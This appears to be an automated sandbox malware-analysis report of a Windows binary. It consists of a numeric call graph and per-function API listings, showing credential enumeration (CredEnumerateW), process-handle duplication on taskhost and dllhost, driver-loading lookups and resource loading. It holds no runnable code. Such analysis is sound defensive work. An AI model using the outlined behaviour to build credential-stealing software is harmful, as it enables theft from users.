42bfcf memcpy 40122->40150 40123->40122 40124->40122 40127->40122 40128->40100 40153 43817e 40129->40153 40131 42ff99 40132 42ffe3 40131->40132 40133 42ffd0 40131->40133 40136 42ff9d 40131->40136 40158 4169a7 11 API calls 40132->40158 40157 4169a7 11 API calls 40133->40157 40136->40119 40138 415a9d 40137->40138 40139 415ab3 40138->40139 40140 415aa4 memset 40138->40140 40139->40119 40140->40139 40307 4165a0 40141->40307 40144->40119 40145->40119 40146->40119 40147->40119 40148->40122 40149->40122 40150->40122 40151->40110 40152->40118 40154 438187 40153->40154 40156 438192 40153->40156 40159 4380f6 40154->40159 40156->40131 40157->40136 40158->40136 40161 43811f 40159->40161 40160 438164 40160->40156 40161->40160 40164 437e5e 40161->40164 40187 4300e8 memset memset memcpy 40161->40187 40188 437d3c 40164->40188 40166 437eb3 40166->40161 40167 437ea9 40167->40166 40172 437f22 40167->40172 40203 41f432 40167->40203 40170 437f06 40250 415c56 11 API calls 40170->40250 40174 437f7f 40172->40174 40175 432d4e 3 API calls 40172->40175 40173 437f95 40251 415c56 11 API calls 40173->40251 40174->40173 40176 43802b 40174->40176 40175->40174 40178 4165ff 11 API calls 40176->40178 40179 438054 40178->40179 40214 437371 40179->40214 40182 43806b 40183 438094 40182->40183 40252 42f50e 138 API calls 40182->40252 40186 437fa3 40183->40186 40253 4300e8 memset memset memcpy 40183->40253 40186->40166 40254 41f638 104 API calls 40186->40254 40187->40161 40189 437d69 40188->40189 40192 437d80 40188->40192 40255 437ccb 11 API calls 40189->40255 40191 437d76 40191->40167 40192->40191 40193 437da3 40192->40193 40195 437d90 40192->40195 40196 438460 134 API calls 40193->40196 40195->40191 40259 437ccb 11 API calls 40195->40259 40199 437dcb 40196->40199 40197 437de8 40258 424f26 123 API calls 40197->40258 40199->40197 40256 444283 13 API calls 40199->40256 40201 437dfc 40257 437ccb 11 API calls 40201->40257 40204 41f54d 40203->40204 40210 41f44f 40203->40210 40205 41f466 40204->40205 40289 41c635 memset memset 40204->40289 40205->40170 40205->40172 40210->40205 40212 41f50b 40210->40212 40260 41f1a5 40210->40260 40285 41c06f memcmp 40210->40285 40286 41f3b1 90 API calls 40210->40286 40287 41f398 86 API calls 40210->40287 40212->40204 40212->40205 40288 41c295 86 API calls 40212->40288 40290 41703f 40214->40290 40216 437399 40217 43739d 40216->40217 40219 4373ac 40216->40219 40297 4446ea 11 API calls 40217->40297 40220 416935 16 API calls 40219->40220 40221 4373ca 40220->40221 40222 438460 134 API calls 40221->40222 40227 4251c4 137 API calls 40221->40227 40231 415a91 memset 40221->40231 40234 43758f 40221->40234 40246 437584 40221->40246 40249 437d3c 135 API calls 40221->40249 40298 425433 13 API calls 40221->40298 40299 425413 17 API calls 40221->40299 40300 42533e 16 API calls 40221->40300 40301 42538f 16 API calls 40221->40301 40302 42453e 123 API calls 40221->40302 40222->40221 40223 4375bc 40225 415c7d 16 API calls 40223->40225 40226 4375d2 40225->40226 40228 4442e6 11 API calls 40226->40228 40248 4373a7 40226->40248 40227->40221 40229 4375e2 40228->40229 40229->40248 40305 444283 13 API calls 40229->40305 40231->40221 40303 42453e 123 API calls 40234->40303 40237 4375f4 40240 437620 40237->40240 40241 43760b 40237->40241 40239 43759f 40242 416935 16 API calls 40239->40242 40244 416935 16 API calls 40240->40244 40306 444283 13 API calls 40241->40306 40242->40246 40244->40248 40246->40223 40304 42453e 123 API calls 40246->40304 40247 437612 memcpy 40247->40248 40248->40182 40249->40221 40250->40166 40251->40186 40252->40183 40253->40186 40254->40166 40255->40191 40256->40201 40257->40197 40258->40191 40259->40191 40261 41bc3b 101 API calls 40260->40261 40262 41f1b4 40261->40262 40263 41edad 86 API calls 40262->40263 40270 41f282 40262->40270 40264 41f1cb 40263->40264 40265 41f1f5 memcmp 40264->40265 40266 41f20e 40264->40266 40264->40270 40265->40266 40267 41f21b memcmp 40266->40267 40266->40270 40268 41f326 40267->40268 40271 41f23d 40267->40271 40269 41ee6b 86 API calls 40268->40269 40268->40270 40269->40270 40270->40210 40271->40268 40272 41f28e memcmp 40271->40272 40274 41c8df 56 API calls 40271->40274 40272->40268 40273 41f2a9 40272->40273 40273->40268 40276 41f308 40273->40276 40277 41f2d8 40273->40277 40275 41f269 40274->40275 40275->40268 40278 41f287 40275->40278 40279 41f27a 40275->40279 40276->40268 40283 4446ce 11 API calls 40276->40283 40280 41ee6b 86 API calls 40277->40280 40278->40272 40281 41ee6b 86 API calls 40279->40281 40282 41f2e0 40280->40282 40281->40270 40284 41b1ca memset 40282->40284 40283->40268 40284->40270 40285->40210 40286->40210 40287->40210 40288->40204 40289->40205 40291 417044 40290->40291 40292 41705c 40290->40292 40294 416760 11 API calls 40291->40294 40296 417055 40291->40296 40293 417075 40292->40293 40295 41707a 11 API calls 40292->40295 40293->40216 40294->40296 40295->40291 40296->40216 40297->40248 40298->40221 40299->40221 40300->40221 40301->40221 40302->40221 40303->40239 40304->40223 40305->40237 40306->40247 40312 415cfe 40307->40312 40316 415d23 __aullrem __aulldvrm 40312->40316 40319 41628e 40312->40319 40313 4163ca 40326 416422 11 API calls 40313->40326 40315 416172 memset 40315->40316 40316->40313 40316->40315 40317 416422 10 API calls 40316->40317 40318 415cb9 10 API calls 40316->40318 40316->40319 40317->40316 40318->40316 40320 416520 40319->40320 40321 416527 40320->40321 40325 416574 40320->40325 40322 416544 40321->40322 40321->40325 40327 4156aa 11 API calls 40321->40327 40324 416561 memcpy 40322->40324 40322->40325 40324->40325 40325->40119 40326->40319 40327->40322 40349 41493c EnumResourceNamesW 37672 4287c1 37673 4287d2 37672->37673 37674 429ac1 37672->37674 37675 428818 37673->37675 37676 42881f 37673->37676 37691 425711 37673->37691 37686 425ad6 37674->37686 37742 415c56 11 API calls 37674->37742 37709 42013a 37675->37709 37737 420244 97 API calls 37676->37737 37681 4260dd 37736 424251 120 API calls 37681->37736 37683 4259da 37735 416760 11 API calls 37683->37735 37689 422aeb memset memcpy memcpy 37689->37691 37690 429a4d 37692 429a66 37690->37692 37696 429a9b 37690->37696 37691->37674 37691->37683 37691->37689 37691->37690 37694 4260a1 37691->37694 37705 4259c2 37691->37705 37708 425a38 37691->37708 37725 4227f0 memset memcpy 37691->37725 37726 422b84 15 API calls 37691->37726 37727 422b5d memset memcpy memcpy 37691->37727 37728 422640 13 API calls 37691->37728 37730 4241fc 11 API calls 37691->37730 37731 42413a 90 API calls 37691->37731 37738 415c56 11 API calls 37692->37738 37734 415c56 11 API calls 37694->37734 37697 429a96 37696->37697 37740 416760 11 API calls 37696->37740 37741 424251 120 API calls 37697->37741 37700 429a7a 37739 416760 11 API calls 37700->37739 37705->37686 37729 415c56 11 API calls 37705->37729 37708->37705 37732 422640 13 API calls 37708->37732 37733 4226e0 12 API calls 37708->37733 37710 42014c 37709->37710 37713 420151 37709->37713 37752 41e466 97 API calls 37710->37752 37712 420162 37712->37691 37713->37712 37714 4201b3 37713->37714 37715 420229 37713->37715 37716 4201b8 37714->37716 37717 4201dc 37714->37717 37715->37712 37718 41fd5e 86 API calls 37715->37718 37743 41fbdb 37716->37743 37717->37712 37721 4201ff 37717->37721 37749 41fc4c 37717->37749 37718->37712 37721->37712 37724 42013a 97 API calls 37721->37724 37724->37712 37725->37691 37726->37691 37727->37691 37728->37691 37729->37683 37730->37691 37731->37691 37732->37708 37733->37708 37734->37683 37735->37681 37736->37686 37737->37691 37738->37700 37739->37697 37740->37697 37741->37674 37742->37683 37744 41fbf1 37743->37744 37745 41fbf8 37743->37745 37748 41fc39 37744->37748 37767 4446ce 11 API calls 37744->37767 37757 41ee26 37745->37757 37748->37712 37753 41fd5e 37748->37753 37750 41ee6b 86 API calls 37749->37750 37751 41fc5d 37750->37751 37751->37717 37752->37713 37755 41fd65 37753->37755 37754 41fdab 37754->37712 37755->37754 37756 41fbdb 86 API calls 37755->37756 37756->37755 37758 41ee41 37757->37758 37759 41ee32 37757->37759 37768 41edad 37758->37768 37771 4446ce 11 API calls 37759->37771 37762 41ee3c 37762->37744 37765 41ee58 37765->37762 37773 41ee6b 37765->37773 37767->37748 37777 41be52 37768->37777 37771->37762 37772 41eb85 11 API calls 37772->37765 37774 41ee70 37773->37774 37775 41ee78 37773->37775 37833 41bf99 86 API calls 37774->37833 37775->37762 37778 41be6f 37777->37778 37779 41be5f 37777->37779 37785 41be8c 37778->37785 37798 418c63 37778->37798 37812 4446ce 11 API calls 37779->37812 37782 41be69 37782->37762 37782->37772 37783 41bee7 37783->37782 37816 41a453 86 API calls 37783->37816 37785->37782 37785->37783 37786 41bf3a 37785->37786 37789 41bed1 37785->37789 37815 4446ce 11 API calls 37786->37815 37788 41bef0 37788->37783 37791 41bf01 37788->37791 37789->37788 37792 41bee2 37789->37792 37790 41bf24 memset 37790->37782 37791->37790 37793 41bf14 37791->37793 37813 418a6d memset memcpy memset 37791->37813 37802 41ac13 37792->37802 37814 41a223 memset memcpy memset 37793->37814 37797 41bf20 37797->37790 37801 418c72 37798->37801 37799 418c94 37799->37785 37800 418d51 memset memset 37800->37799 37801->37799 37801->37800 37803 41ac52 37802->37803 37804 41ac3f memset 37802->37804 37807 41ac6a 37803->37807 37817 41dc14 19 API calls 37803->37817 37805 41acd9 37804->37805 37805->37783 37809 41aca1 37807->37809 37818 41519d 37807->37818 37809->37805 37810 41acc0 memset 37809->37810 37811 41accd memcpy 37809->37811 37810->37805 37811->37805 37812->37782 37813->37793 37814->37797 37815->37783 37817->37807 37821 4175ed 37818->37821 37829 417570 SetFilePointer 37821->37829 37824 41760a ReadFile 37825 417637 37824->37825 37826 417627 GetLastError 37824->37826 37827 4151b3 37825->37827 37828 41763e memset 37825->37828 37826->37827 37827->37809 37828->37827 37830 4175b2 37829->37830 37831 41759c GetLastError 37829->37831 37830->37824 37830->37827 37831->37830 37832 4175a8 GetLastError 37831->37832 37832->37830 37833->37775 37834 417bc5 37835 417c61 37834->37835 37840 417bda 37834->37840 37836 417bf6 UnmapViewOfFile CloseHandle 37836->37836 37836->37840 37838 417c2c 37838->37840 37846 41851e 20 API calls 37838->37846 37840->37835 37840->37836 37840->37838 37841 4175b7 37840->37841 37842 4175d6 FindCloseChangeNotification 37841->37842 37843 4175c8 37842->37843 37844 4175df 37842->37844 37843->37844 37845 4175ce Sleep 37843->37845 37844->37840 37845->37842 37846->37838 39808 4147f3 39811 414561 39808->39811 39810 414813 39812 41456d 39811->39812 39813 41457f GetPrivateProfileIntW 39811->39813 39816 4143f1 memset _itow WritePrivateProfileStringW 39812->39816 39813->39810 39815 41457a 39815->39810 39816->39815

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 FindCloseChangeNotification GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 354 40de5a 351->354 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 356 40de5d-40de63 354->356 358 40de74-40de78 356->358 359 40de65-40de6c 356->359 358->352 358->356 359->358 361 40de6e-40de71 359->361 361->358 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 381 40df23-40df4a GetCurrentProcess DuplicateHandle 379->381 380->378 382 40dfd1-40dfd3 380->382 381->380 383 40df4c-40df76 memset call 41352f 381->383 382->377 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                      APIs
                                      • memset.MSVCRT ref: 0040DDAD
                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                      • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                        • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                      • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                      • FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                      • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                      • _wcsicmp.MSVCRT ref: 0040DEB2
                                      • _wcsicmp.MSVCRT ref: 0040DEC5
                                      • _wcsicmp.MSVCRT ref: 0040DED8
                                      • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                      • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                      • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                      • memset.MSVCRT ref: 0040DF5F
                                      • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                      • _wcsicmp.MSVCRT ref: 0040DFB2
                                      • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: AddressProc$Handle_wcsicmp$CloseProcess$CurrentFileModulememset$??2@ChangeCreateDuplicateFindInformationNameNotificationOpenQuerySystem
                                      • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                      • API String ID: 594330280-3398334509
                                      • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                      • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                      • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                      • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 635 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 638 413f00-413f11 Process32NextW 635->638 639 413da5-413ded OpenProcess 638->639 640 413f17-413f24 CloseHandle 638->640 641 413eb0-413eb5 639->641 642 413df3-413e26 memset call 413f27 639->642 641->638 643 413eb7-413ebd 641->643 650 413e79-413e9d call 413959 call 413ca4 642->650 651 413e28-413e35 642->651 645 413ec8-413eda call 4099f4 643->645 646 413ebf-413ec6 ??3@YAXPAX@Z 643->646 648 413edb-413ee2 645->648 646->648 656 413ee4 648->656 657 413ee7-413efe 648->657 662 413ea2-413eae CloseHandle 650->662 654 413e61-413e68 651->654 655 413e37-413e44 GetModuleHandleW 651->655 654->650 658 413e6a-413e76 654->658 655->654 660 413e46-413e5c GetProcAddress 655->660 656->657 657->638 658->650 660->654 662->641
                                      APIs
                                        • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                                      • memset.MSVCRT ref: 00413D7F
                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                      • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                      • memset.MSVCRT ref: 00413E07
                                      • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                      • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                      • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                      • ??3@YAXPAX@Z.MSVCRT ref: 00413EC1
                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                      • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: Handle$??3@CloseProcess32memset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                      • String ID: QueryFullProcessImageNameW$kernel32.dll
                                      • API String ID: 912665193-1740548384
                                      • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                      • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                      • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                      • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                      • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                      • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                      • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                      • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                      • memcpy.MSVCRT ref: 0040B60D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                      • String ID: BIN
                                      • API String ID: 1668488027-1015027815
                                      • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                      • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                      • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                      • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                      APIs
                                        • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                        • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                        • Part of subcall function 00418680: ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                        • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                      • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                      • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                      • ??3@YAXPAX@Z.MSVCRT ref: 00418803
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ??3@DiskFreeSpace$FullNamePathVersionmalloc
                                      • String ID:
                                      • API String ID: 2947809556-0
                                      • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                      • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                      • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                      • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                      APIs
                                      • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                      • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: FileFind$FirstNext
                                      • String ID:
                                      • API String ID: 1690352074-0
                                      • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                      • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                      • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                      • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                      APIs
                                      • memset.MSVCRT ref: 0041898C
                                      • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: InfoSystemmemset
                                      • String ID:
                                      • API String ID: 3558857096-0
                                      • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                      • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                      • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                      • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 38 44558e-445594 call 444b06 4->38 39 44557e-44558c call 4136c0 call 41366b 4->39 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 42 445823-445826 14->42 15->16 22 445672-445683 call 40a889 call 403fbe 16->22 23 4455fb-445601 16->23 49 445879-44587c 18->49 24 44594f-445958 19->24 25 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->25 82 445685 22->82 83 4456b2-4456b5 call 40b1ab 22->83 34 445605-445607 23->34 35 445603 23->35 32 4459f2-4459fa 24->32 33 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 24->33 134 44592d-445945 call 40b6ef 25->134 135 44594a 25->135 44 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 32->44 45 445b29-445b32 32->45 153 4459d0-4459e8 call 40b6ef 33->153 154 4459ed 33->154 34->22 41 445609-44560d 34->41 35->34 38->3 39->38 41->22 50 44560f-445641 call 4087b3 call 40a889 call 4454bf 41->50 51 44584c-445854 call 40b1ab 42->51 52 445828 42->52 182 445b08-445b15 call 40ae51 44->182 53 445c7c-445c85 45->53 54 445b38-445b96 memset * 3 45->54 63 4458a2-4458aa call 40b1ab 49->63 64 44587e 49->64 150 445665-445670 call 40b1ab 50->150 151 445643-445663 call 40a9b5 call 4087b3 50->151 51->13 66 44582e-445847 call 40a9b5 call 4087b3 52->66 60 445d1c-445d25 53->60 61 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->61 67 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 54->67 68 445b98-445ba0 54->68 87 445fae-445fb2 60->87 88 445d2b-445d3b 60->88 168 445cf5 61->168 169 445cfc-445d03 61->169 63->19 80 445884-44589d call 40a9b5 call 4087b3 64->80 137 445849 66->137 247 445c77 67->247 68->67 81 445ba2-445bcf call 4099c6 call 445403 call 445389 68->81 156 44589f 80->156 81->53 99 44568b-4456a4 call 40a9b5 call 4087b3 82->99 115 4456ba-4456c4 83->115 89 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 88->89 90 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 88->90 162 445d67-445d6c 89->162 163 445d71-445d83 call 445093 89->163 196 445e17 90->196 197 445e1e-445e25 90->197 158 4456a9-4456b0 99->158 129 4457f9 115->129 130 4456ca-4456d3 call 413cfa call 413d4c 115->130 129->6 172 4456d8-4456f7 call 40b2cc call 413fa6 130->172 134->135 135->24 137->51 150->115 151->150 153->154 154->32 156->63 158->83 158->99 174 445fa1-445fa9 call 40b6ef 162->174 163->87 168->169 179 445d05-445d13 169->179 180 445d17 169->180 205 4456fd-445796 memset * 4 call 409c70 * 3 172->205 206 4457ea-4457f7 call 413d29 172->206 174->87 179->180 180->60 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->45 201->182 219 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->219 242 445e62-445e69 202->242 243 445e5b 202->243 218 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->218 205->206 246 445798-4457ca call 40b2cc call 409d1f call 409b98 205->246 206->10 218->87 255 445f9b 218->255 219->182 242->203 248 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 242->248 243->242 246->206 265 4457cc-4457e5 call 4087b3 246->265 247->53 264 445f4d-445f5a call 40ae51 248->264 255->174 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->206 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->218 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                      APIs
                                      • memset.MSVCRT ref: 004455C2
                                      • wcsrchr.MSVCRT ref: 004455DA
                                      • memset.MSVCRT ref: 0044570D
                                      • memset.MSVCRT ref: 00445725
                                        • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                        • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                        • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                        • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                        • Part of subcall function 0040BDB0: _wcsncoll.MSVCRT ref: 0040BE38
                                        • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                        • Part of subcall function 0040BDB0: memcpy.MSVCRT ref: 0040BEB2
                                        • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                      • memset.MSVCRT ref: 0044573D
                                      • memset.MSVCRT ref: 00445755
                                      • memset.MSVCRT ref: 004458CB
                                      • memset.MSVCRT ref: 004458E3
                                      • memset.MSVCRT ref: 0044596E
                                      • memset.MSVCRT ref: 00445A10
                                      • memset.MSVCRT ref: 00445A28
                                      • memset.MSVCRT ref: 00445AC6
                                        • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                        • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                        • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                        • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                        • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                      • memset.MSVCRT ref: 00445B52
